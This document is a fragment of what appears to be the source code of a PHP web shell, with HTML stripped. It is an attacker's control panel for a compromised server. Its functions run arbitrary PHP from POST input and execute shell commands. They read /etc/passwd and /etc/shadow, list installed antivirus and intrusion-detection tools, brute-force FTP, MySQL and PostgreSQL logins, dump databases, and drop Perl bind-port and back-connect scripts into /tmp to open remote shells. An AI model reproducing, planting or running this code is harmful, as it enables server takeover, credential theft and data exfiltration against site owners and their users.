\n\t
";\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\n $totalSpace = $totalSpace?$totalSpace:1;\n $release = @php_uname(\'r\');\n $kernel = @php_uname(\'s\');\n $explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\n if(strpos(\'Linux\', $kernel) !== false)\n $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\n else\n $explink .= urlencode($kernel . \' \' . substr($release,0,3));\n if(!function_exists(\'posix_getegid\')) {\n $user = @get_current_user();\n $uid = @getmyuid();\n $gid = @getmygid();\n $group = "?";\n } else {\n $uid = @posix_getpwuid(posix_geteuid());\n $gid = @posix_getgrgid(posix_getegid());\n $user = $uid[\'name\'];\n $uid = $uid[\'uid\'];\n $group = $gid[\'name\'];\n $gid = $gid[\'gid\'];\n }\n\n $cwd_links = \'\';\n $path = explode("/", $GLOBALS[\'cwd\']);\n $n=count($path);\n for($i=0; $i<$n-1; $i++) {\n $cwd_links .= "
".$path[$i]."/";\n }\n\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\n $opt_charsets = \'\';\n foreach($charsets as $item)\n $opt_charsets .= \'
\';\n\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'ff_man\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\n if(!empty($GLOBALS[\'auth_pass\']))\n $m[\'Logout\'] = \'Logout\';\n $m[\'Self remove\'] = \'SelfRemove\';\n $menu = \'\';\n foreach($m as $k => $v)\n $menu .= \'
[ \'.$k.\' ] | \';\n\n $drives = "";\n if($GLOBALS[\'os\'] == \'win\') {\n foreach(range(\'c\',\'z\') as $drive)\n if(is_dir($drive.\':\\\\\'))\n $drives .= \'
[ \'.$drive.\' ] \';\n }\n echo \'
Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \' | \'\n . \'\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\')\n . \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . wsoViewSize($totalSpace) . \' Free: \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \' | \'\n . \'
Server IP:
\' . @$_SERVER["SERVER_ADDR"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \' |
\'\n . \'
\';\n }\n\n function wsoFooter() {\n $is_writable = is_writable($GLOBALS[\'cwd\'])?" ":"Yes(Not)";\n echo "\n\t
\n\t
\';\n function wsoSecParam($n, $v) {\n $v = trim($v);\n if($v) {\n echo \'
\' . $n . \': \';\n if(strpos($v, "\\n") === false)\n echo $v . \'
\';\n else\n echo \'
\' . $v . \'
\';\n }\n }\n\n wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\n if(function_exists(\'apache_get_modules\'))\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\n wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\n wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\n wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\n wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\n wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\n $temp=array();\n if(function_exists(\'mysql_get_client_info\'))\n $temp[] = "MySql (".mysql_get_client_info().")";\n if(function_exists(\'mssql_connect\'))\n $temp[] = "MSSQL";\n if(function_exists(\'pg_connect\'))\n $temp[] = "PostgreSQL";\n if(function_exists(\'oci_connect\'))\n $temp[] = "Oracle";\n wsoSecParam(\'Supported databases\', implode(\', \', $temp));\n echo \'
\';\n\n if($GLOBALS[\'os\'] == \'nix\') {\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes
[view]":\'no\');\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes
[view]":\'no\');\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\n if(!$GLOBALS[\'safe_mode\']) {\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\n echo \'
\';\n $temp=array();\n foreach ($userful as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Userful\', implode(\', \',$temp));\n $temp=array();\n foreach ($danger as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Danger\', implode(\', \',$temp));\n $temp=array();\n foreach ($downloaders as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\n echo \'
\';\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\n echo \'
posix_getpwuid ("Read" /etc/passwd)\';\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\n $temp = "";\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\n $uid = @posix_getpwuid($_POST[\'p2\']);\n if ($uid)\n $temp .= join(\':\',$uid)."\\n";\n }\n echo \'
\';\n wsoSecParam(\'Users\', $temp);\n }\n }\n } else {\n wsoSecParam(\'OS Version\',wsoEx(\'ver\'));\n wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\n wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\n }\n echo \'
\';\n ob_start();\n phpinfo();\n $tmp = ob_get_clean();\n $tmp = preg_replace(array (\n \'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\n \'!td, th {(.*)}!msiU\',\n \'!
]+>!msiU\',\n ), array (\n \'\',\n \'.e, .v, .h, .h th {$1}\',\n \'\'\n ), $tmp);\n echo str_replace(\'
\';\n }\n echo \'Execution PHP-code
\';\n if(!empty($_POST[\'p1\'])) {\n ob_start();\n eval($_POST[\'p1\']);\n echo htmlspecialchars(ob_get_clean());\n }\n echo \'File manager
\';\n $dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\n if($dirContent === false) {\techo \'Can\\\'t open this folder!\';wsoFooter(); return; }\n global $sort;\n $sort = array(\'name\', 1);\n if(!empty($_POST[\'p1\'])) {\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\n $sort = array($match[1], (int)$match[2]);\n }\n echo "\n\t
String conversions
\';\n echo "
";\n if(!empty($_POST[\'p1\'])) {\n if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\n }\n echo"
Search files:
\n\t\t\t
";\n\n function wsoRecursiveGlob($path) {\n if(substr($path, -1) != \'/\')\n $path.=\'/\';\n $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\n if(is_array($paths)&&@count($paths)) {\n foreach($paths as $item) {\n if(@is_dir($item)){\n if($path!=$item)\n wsoRecursiveGlob($item);\n } else {\n if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)\n echo "
".htmlspecialchars($item)."";\n }\n }\n }\n }\n if(@$_POST[\'p3\'])\n wsoRecursiveGlob($_POST[\'c\']);\n echo "
Search for hash:
\n\t\t\t
";\n wsoFooter();\n }\n\n function actionff_tools() {\n if( isset($_POST[\'p1\']) )\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\n if(@$_POST[\'p2\']==\'download\') {\n if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\n if (function_exists("mime_content_type")) {\n $type = @mime_content_type($_POST[\'p1\']);\n header("Content-Type: " . $type);\n } else\n header("Content-Type: application/octet-stream");\n $fp = @fopen($_POST[\'p1\'], "r");\n if($fp) {\n while(!@feof($fp))\n echo @fread($fp, 1024);\n fclose($fp);\n }\n }exit;\n }\n if( @$_POST[\'p2\'] == \'mkfile\' ) {\n if(!file_exists($_POST[\'p1\'])) {\n $fp = @fopen($_POST[\'p1\'], \'w\');\n if($fp) {\n $_POST[\'p2\'] = "edit";\n fclose($fp);\n }\n }\n }\n wsoHeader();\n echo \'File tools
\';\n if( !file_exists(@$_POST[\'p1\']) ) {\n echo \'File not exists\';\n wsoFooter();\n return;\n }\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\n if(!$uid) {\n $uid[\'name\'] = @fileowner($_POST[\'p1\']);\n $gid[\'name\'] = @filegroup($_POST[\'p1\']);\n } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\n echo \'
Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\'
Size: \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\'
Permission: \'.wsoPermsColor($_POST[\'p1\']).\'
Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\n echo \'
Change time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\'
Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\'
Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'
\';\n if( empty($_POST[\'p2\']) )\n $_POST[\'p2\'] = \'view\';\n if( is_file($_POST[\'p1\']) )\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\n else\n $m = array(\'Chmod\', \'Rename\', \'Touch\');\n foreach($m as $v)\n echo \'
\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\n echo \'
\';\n switch($_POST[\'p2\']) {\n case \'view\':\n echo \'
\';\n $fp = @fopen($_POST[\'p1\'], \'r\');\n if($fp) {\n while( !@feof($fp) )\n echo htmlspecialchars(@fread($fp, 1024));\n @fclose($fp);\n }\n echo \'\';\n break;\n case \'highlight\':\n if( @is_readable($_POST[\'p1\']) ) {\n echo \'
\';\n $code = @highlight_file($_POST[\'p1\'],true);\n echo str_replace(array(\'\'), array(\'\'),$code).\'
\';\n }\n break;\n case \'chmod\':\n if( !empty($_POST[\'p3\']) ) {\n $perms = 0;\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\n if(!@chmod($_POST[\'p1\'], $perms))\n echo \'Can\\\'t set permissions!
\';\n }\n clearstatcache();\n echo \'
\';\n break;\n case \'edit\':\n if( !is_writable($_POST[\'p1\'])) {\n echo \'File isn\\\'t wr-le\';\n break;\n }\n if( !empty($_POST[\'p3\']) ) {\n $time = @filemtime($_POST[\'p1\']);\n $_POST[\'p3\'] = substr($_POST[\'p3\'],1);\n $fp = @fopen($_POST[\'p1\'],"w");\n if($fp) {\n @fwrite($fp,$_POST[\'p3\']);\n @fclose($fp);\n echo \'Saved!
\';\n @touch($_POST[\'p1\'],$time,$time);\n }\n }\n echo \'
\';\n break;\n case \'hexdump\':\n $c = @file_get_contents($_POST[\'p1\']);\n $n = 0;\n $h = array(\'00000000
\',\'\',\'\');\n $len = strlen($c);\n for ($i=0; $i<$len; ++$i) {\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\n switch ( ord($c[$i]) ) {\n case 0: $h[2] .= \' \'; break;\n case 9: $h[2] .= \' \'; break;\n case 10: $h[2] .= \' \'; break;\n case 13: $h[2] .= \' \'; break;\n default: $h[2] .= $c[$i]; break;\n }\n $n++;\n if ($n == 32) {\n $n = 0;\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}\n $h[1] .= \'
\';\n $h[2] .= "\\n";\n }\n }\n echo \'
\'.$h[0].\' | \'.$h[1].\' | \'.htmlspecialchars($h[2]).\' |
\';\n break;\n case \'rename\':\n if( !empty($_POST[\'p3\']) ) {\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\n echo \'Can\\\'t rename!
\';\n else\n die(\'\');\n }\n echo \'
\';\n break;\n case \'touch\':\n if( !empty($_POST[\'p3\']) ) {\n $time = strtotime($_POST[\'p3\']);\n if($time) {\n if(!touch($_POST[\'p1\'],$time,$time))\n echo \'Fail!\';\n else\n echo \'Touched!\';\n } else echo \'Bad time format!\';\n }\n clearstatcache();\n echo \'
\';\n break;\n }\n echo \'
Console
\';\n wsoFooter();\n }\n\n function actionLogout() {\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\n die(\'bye!\');\n }\n\n function actionSelfRemove() {\n\n if($_POST[\'p1\'] == \'yes\')\n if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\n die(\'Shell has been removed\');\n else\n echo \'unlink error!\';\n if($_POST[\'p1\'] != \'yes\')\n wsoHeader();\n echo \'Suicide
Really want to remove the shell?
YesResults
Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';\n if( $_POST[\'proto\'] == \'ftp\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $fp = @ftp_connect($ip, $port?$port:21);\n if(!$fp) return false;\n $res = @ftp_login($fp, $login, $pass);\n @ftp_close($fp);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'mysql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\n @mysql_close($res);\n return $res;\n }\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) {\n function wsoBruteForce($ip,$port,$login,$pass) {\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\n $res = @pg_connect($str);\n @pg_close($res);\n return $res;\n }\n }\n $success = 0;\n $attempts = 0;\n $server = explode(":", $_POST[\'server\']);\n if($_POST[\'type\'] == 1) {\n $temp = @file(\'/etc/passwd\');\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = explode(":", $line);\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\n $success++;\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\';\n }\n if(@$_POST[\'reverse\']) {\n $tmp = "";\n for($i=strlen($line[0])-1; $i>=0; --$i)\n $tmp .= $line[0][$i];\n ++$attempts;\n if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\n $success++;\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);\n }\n }\n }\n } elseif($_POST[\'type\'] == 2) {\n $temp = @file($_POST[\'dict\']);\n if( is_array($temp) )\n foreach($temp as $line) {\n $line = trim($line);\n ++$attempts;\n if( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\n $success++;\n echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';\n }\n }\n }\n echo "Attempts: $attempts Success: $success
";\n }\n echo \'Bruteforce
\';\n wsoFooter();\n }\n\n function actionSql() {\n class DbClass {\n var $type;\n var $link;\n var $res;\n function __construct($type)\t{\n $this->type = $type;\n }\n function connect($host, $user, $pass, $dbname){\n switch($this->type)\t{\n case \'mysql\':\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\n break;\n case \'pgsql\':\n $host = explode(\':\', $host);\n if(!$host[1]) $host[1]=5432;\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\n break;\n }\n return false;\n }\n function selectdb($db) {\n switch($this->type)\t{\n case \'mysql\':\n if (@mysql_select_db($db))return true;\n break;\n }\n return false;\n }\n function query($str) {\n switch($this->type) {\n case \'mysql\':\n return $this->res = @mysql_query($str);\n break;\n case \'pgsql\':\n return $this->res = @pg_query($this->link,$str);\n break;\n }\n return false;\n }\n function fetch() {\n $res = func_num_args()?func_get_arg(0):$this->res;\n switch($this->type)\t{\n case \'mysql\':\n return @mysql_fetch_assoc($res);\n break;\n case \'pgsql\':\n return @pg_fetch_assoc($res);\n break;\n }\n return false;\n }\n function listDbs() {\n switch($this->type)\t{\n case \'mysql\':\n return $this->query("SHOW databases");\n break;\n case \'pgsql\':\n return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\n break;\n }\n return false;\n }\n function listTables() {\n switch($this->type)\t{\n case \'mysql\':\n return $this->res = $this->query(\'SHOW TABLES\');\n break;\n case \'pgsql\':\n return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\n break;\n }\n return false;\n }\n function error() {\n switch($this->type)\t{\n case \'mysql\':\n return @mysql_error();\n break;\n case \'pgsql\':\n return @pg_last_error();\n break;\n }\n return false;\n }\n function setCharset($str) {\n switch($this->type)\t{\n case \'mysql\':\n if(function_exists(\'mysql_set_charset\'))\n return @mysql_set_charset($str, $this->link);\n else\n $this->query(\'SET CHARSET \'.$str);\n break;\n case \'pgsql\':\n return @pg_set_client_encoding($this->link, $str);\n break;\n }\n return false;\n }\n function loadFile($str) {\n switch($this->type)\t{\n case \'mysql\':\n return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\n break;\n case \'pgsql\':\n $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\n $r=array();\n while($i=$this->fetch())\n $r[] = $i[\'file\'];\n $this->query(\'drop table wso2\');\n return array(\'file\'=>implode("\\n",$r));\n break;\n }\n return false;\n }\n function dump($table, $fp = false) {\n switch($this->type)\t{\n case \'mysql\':\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\n $create = mysql_fetch_array($res);\n $sql = $create[1].";\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\n $i = 0;\n $head = true;\n while($item = $this->fetch()) {\n $sql = \'\';\n if($i % 1000 == 0) {\n $head = true;\n $sql = ";\\n\\n";\n }\n\n $columns = array();\n foreach($item as $k=>$v) {\n if($v === null)\n $item[$k] = "NULL";\n elseif(is_int($v))\n $item[$k] = $v;\n else\n $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\n $columns[] = "`".$k."`";\n }\n if($head) {\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\n $head = false;\n } else\n $sql .= "\\n\\t,(".implode(", ", $item).\')\';\n if($fp) fwrite($fp, $sql); else echo($sql);\n $i++;\n }\n if(!$head)\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\n break;\n case \'pgsql\':\n $this->query(\'SELECT * FROM \'.$table);\n while($item = $this->fetch()) {\n $columns = array();\n foreach($item as $k=>$v) {\n $item[$k] = "\'".addslashes($v)."\'";\n $columns[] = $k;\n }\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\n if($fp) fwrite($fp, $sql); else echo($sql);\n }\n break;\n }\n return false;\n }\n };\n $db = new DbClass($_POST[\'type\']);\n if((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\n $db->selectdb($_POST[\'sql_base\']);\n switch($_POST[\'charset\']) {\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n case "UTF-8": $db->setCharset(\'utf8\'); break;\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n case "cp866": $db->setCharset(\'cp866\'); break;\n }\n if(empty($_POST[\'file\'])) {\n ob_start("ob_gzhandler", 4096);\n header("Content-Disposition: attachment; filename=dump.sql");\n header("Content-Type: text/plain");\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v);\n exit;\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\n foreach($_POST[\'tbl\'] as $v)\n $db->dump($v, $fp);\n fclose($fp);\n unset($_POST[\'p2\']);\n } else\n die(\'\');\n }\n wsoHeader();\n echo "\n\tSql browser
\n\t
";\n if($_POST[\'type\']==\'mysql\') {\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\n if($db->fetch())\n echo "
";\n }\n if(@$_POST[\'p1\'] == \'loadfile\') {\n $file = $db->loadFile($_POST[\'p2\']);\n echo \'
\'.htmlspecialchars($file[\'file\']).\'
\';\n }\n } else {\n echo htmlspecialchars($db->error());\n }\n echo \'
Network tools
\n\t\t
\n\t\t
";\n if(isset($_POST[\'p1\'])) {\n function cf($f,$t) {\n $w = @fopen($f,"w") or @function_exists(\'file_put_contents\');\n if($w){\n @fwrite($w,@base64_decode($t));\n @fclose($w);\n }\n }\n if($_POST[\'p1\'] == \'bpp\') {\n cf("/tmp/bp.pl",$bind_port_p);\n $out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "
$out\\n".wsoEx("ps aux | grep bp.pl")."";\n unlink("/tmp/bp.pl");\n }\n if($_POST[\'p1\'] == \'bcp\') {\n cf("/tmp/bc.pl",$back_connect_p);\n $out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");\n sleep(1);\n echo "
$out\\n".wsoEx("ps aux | grep bc.pl")."";\n unlink("/tmp/bc.pl");\n }\n }\n echo \'